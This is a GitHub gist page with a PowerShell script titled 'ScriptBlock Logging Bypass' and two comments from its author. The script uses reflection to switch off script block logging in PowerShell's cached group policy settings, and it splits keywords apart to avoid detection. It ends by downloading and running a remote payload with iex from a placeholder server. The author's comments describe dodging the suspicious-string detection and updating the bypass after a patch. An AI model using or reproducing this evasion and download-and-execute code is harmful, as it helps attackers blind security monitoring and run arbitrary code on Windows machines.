Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
iex (New-Object Net.WebClient).downloadstring("https://myserver/mypayload.ps1")
Copy link

cobbr commented Jul 9, 2017

Turns out I missed a couple of those "suspicious strings" the first time around. This now gets logged at "Verbose" level instead of "Warning".

Copy link

cobbr commented Nov 15, 2017

A little while back, this bypass was 'fixed' (something changed) on the latest version of PS 5.1. Updated it so it will work on all versions of PowerShell.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment